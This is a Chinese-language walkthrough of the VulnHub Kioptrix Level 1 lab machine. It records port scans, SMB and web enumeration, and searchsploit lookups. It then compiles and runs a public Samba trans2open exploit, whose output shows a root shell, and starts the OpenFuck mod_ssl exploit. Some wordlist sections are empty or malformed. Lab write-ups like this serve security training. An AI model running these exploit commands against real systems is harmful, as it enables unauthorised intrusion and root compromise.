VulnHub-Kioptrix Level 1 古老的 Apache Vuln

总字符数: 11.97K

代码: 10.32K, 文本: 0.31K

预计阅读时间: 46 分钟

Overview

Name	Template
Release Date	2024-02-24
Write-up Author	Kill3r
Machine Author	Kill3r
Difficulty	Medium
User Flag
Root Flag
Link	https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

薄弱点

gcc编译处理

Nmap扫描

ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.9 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
nmap -p$ports -sV -sC -O 10.10.10.9 -oN nmap.txt
# 第一行代码使用nmap命令扫描本地主机的所有端口（从1到65535），--min-rate=1000参数表示每秒发送最少1000个包，-T4参数表示设置扫描速度为快速扫描模式。
# grep -oE '(^[0-9][^/tcp]*)'用于提取输出结果中的端口号，tr '\n' ','用于将提取的端口号按逗号分隔并拼接成一个字符串。
# 第二行代码使用nmap命令再次扫描指定的端口，-p$ports参数表示扫描之前提取的端口列表，-sV参数表示进行服务版本检测，-sC参数表示在扫描过程中使用默认脚本进行常见漏洞探测，-O参数表示进行操作系统版本检测，-oN nmap.txt参数表示将扫描结果保存到名为nmap.txt的文件中。

┌──(root㉿kill3r)-[/home/kill3r]
└─# ports=$(nmap -p- --min-rate=1000 -T4 192.168.56.101 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')                                                
┌──(root㉿kill3r)-[/home/kill3r]
└─# nmap -p$ports -sV -sC -O 192.168.56.101 -oN nmap.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-04 20:27 CST
Nmap scan report for 10.10.10.9
Host is up (0.00022s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| http-methods:
|_  Potentially risky methods: TRACE
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1           1024/tcp   status
|_  100024  1           1024/udp   status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_ssl-date: 2023-08-04T12:29:55+00:00; +1m50s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:7C:3A:16 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: 1m49s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.82 seconds

枚举

SMB 枚举

Port: 139 389 445 636

enum4linux -a/-A 127.0.0.1

┌──(root㉿kill3r)-[/home/kill3r]
└─$ enum4linux -A 10.10.10.9
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Aug  4 20:29:56 2023

 =========================================( Target Information )=========================================

Target ........... 10.10.10.9
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 =============================( Enumerating Workgroup/Domain on 10.10.10.9 )=============================


[+] Got domain/workgroup name: MYGROUP


 ====================================( Session Check on 10.10.10.9 )====================================


[+] Server 10.10.10.9 allows sessions using username '', password ''


 =================================( Getting domain SID for 10.10.10.9 )=================================

Domain Name: MYGROUP
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup

enum4linux complete on Fri Aug  4 20:29:56 2023

MSF-SMB

# 基于SMB协议扫描版本号
msf6 > use auxiliary/scanner/smb/smb_version
[*] 10.10.10.9:139        - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 10.10.10.9:139        -   Host could not be identified: Unix (Samba 2.2.1a)
[*] 10.10.10.9:           - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
# 扫描共享文件
msf6 > use auxiliary/scanner/smb/smb_enumshares
[*] 10.10.10.9:139        - Starting module
[*] 10.10.10.9:445        - Starting module
[*] 10.10.10.9:           - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
# 基于SMB进行用户信息枚举
msf6 > use auxiliary/scanner/smb/smb_lookupsid
[*] 10.10.10.9:           - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Web

HTTP Web Server, Port Like: 80 443 81 8080 8443 4443 8081

Finger:获取有关特定用户或系统上的用户列表和配置信息

`whatweb`

# 用于识别和分析目标网站的技术栈、CMS（内容管理系统）、插件、框架和其他与网站相关的信息。通过分析网站的响应和页面内容
┌──(root㉿kill3r)-[~]
└─# whatweb 10.10.10.9
http://10.10.10.9 [200 OK] Apache[1.3.20][mod_ssl/2.8.4], Country[RESERVED][ZZ], Email[webmaster@example.com], HTTPServer[Red Hat Linux][Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b], IP[10.10.10.9], OpenSSL[0.9.6b], Title[Test Page for the Apache Web Server on Red Hat Linux]

dirb http://192.168.56.101

dirsearch -u http://192.168.56.101 -r

gobuster dir -w ... -u http://192.168.56.101 -x html,php,js,bak

┌──(root㉿kill3r)-[~]
└─# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -u http://10.10.10.9 -x html,php,js,bak
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.9
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              html,php,js,bak
[+] Timeout:                 10s
===============================================================
2023/08/04 22:41:08 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 269]
/index.html           (Status: 200) [Size: 2890]
/test.php             (Status: 200) [Size: 27]
/manual               (Status: 301) [Size: 294] [--> http://127.0.0.1/manual/]
/usage                (Status: 301) [Size: 293] [--> http://127.0.0.1/usage/]
/mrtg                 (Status: 301) [Size: 292] [--> http://127.0.0.1/mrtg/]
/.html                (Status: 403) [Size: 269]
Progress: 1100338 / 1102805 (99.78%)===============================================================
2023/08/04 22:46:47 Finished
===============================================================

漏洞扫描

1 2	$ nikto -h http://www.example.com/ $ nuclei -u https://example.com/

wordlist

cewl.list:cewl http://192.168.56.101/ -w dict.txt

pass.list

```

- user.list

1
2
3


- hash.list


-  information.list

```bash

Wappalyzer

Web 服务器:Apache HTTP Server 1.3.20
操作系统:UNIX
Web 服务器扩展:OpenSSL 0.9.6b
mod_ssl:2.8.4

复现过程

访问靶场,寻找功能点

无功能点,继续分析其他服务

信息分析

SMB

Samba 2.2.1a

┌──(root㉿kill3r)-[/home/kill3r]
└─$ searchsploit Samba 2.2.1a
---------------------------------------------------------------------------- --------------------------------- Exploit Title                                                              |  Path
---------------------------------------------------------------------------- ---------------------------------Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)                | osx/remote/9924.rb
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution                           | multiple/remote/10.c
Samba < 3.0.20 - Remote Heap Overflow                                       | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                               | linux_x86/dos/36741.py
---------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results
Papers: No Results

最终测试得10.c可用,直接获取shell权限

┌──(root㉿kill3r)-[/home/kill3r]
└─$ gcc 10.c -o samba

┌──(root㉿kill3r)-[/home/kill3r]
└─$ ./samba -b O 10.10.10.9
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)

Mod_ssl:2.8.4

┌──(root㉿kill3r)-[~/.ssh]
└─# searchsploit mod_ssl 2.8.4
---------------------------------------------------------------------------- --------------------------------- Exploit Title                                                              |  Path
---------------------------------------------------------------------------- ---------------------------------Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow        | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)  | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)  | unix/remote/47080.c
---------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results
Papers: No Results


┌──(root㉿kill3r)-[/home/kill3r]
└─# gcc -o OpenFuck 47080.c -lcrypto

┌──(root㉿kill3r)-[/home/kill3r]
└─# ./OpenFuck -h | grep apache-1.3.20
        0x02 - Cobalt Sun 6.0 (apache-1.3.20)
        0x27 - FreeBSD (apache-1.3.20)
        0x28 - FreeBSD (apache-1.3.20)
        0x29 - FreeBSD (apache-1.3.20+2.8.4)
        0x2a - FreeBSD (apache-1.3.20_1)
        0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
        0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
        0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
        0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
        0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
        0x7e - Slackware Linux 8.0 (apache-1.3.20)
        0x86 - SuSE Linux 7.3 (apache-1.3.20)
        
# 我这里只获取到了apache权限,估计是因为编译的时候出问题了吧   
┌──(root㉿kill3r)-[/home/kill3r]
└─# ./OpenFuck 0x6b 10.10.10.9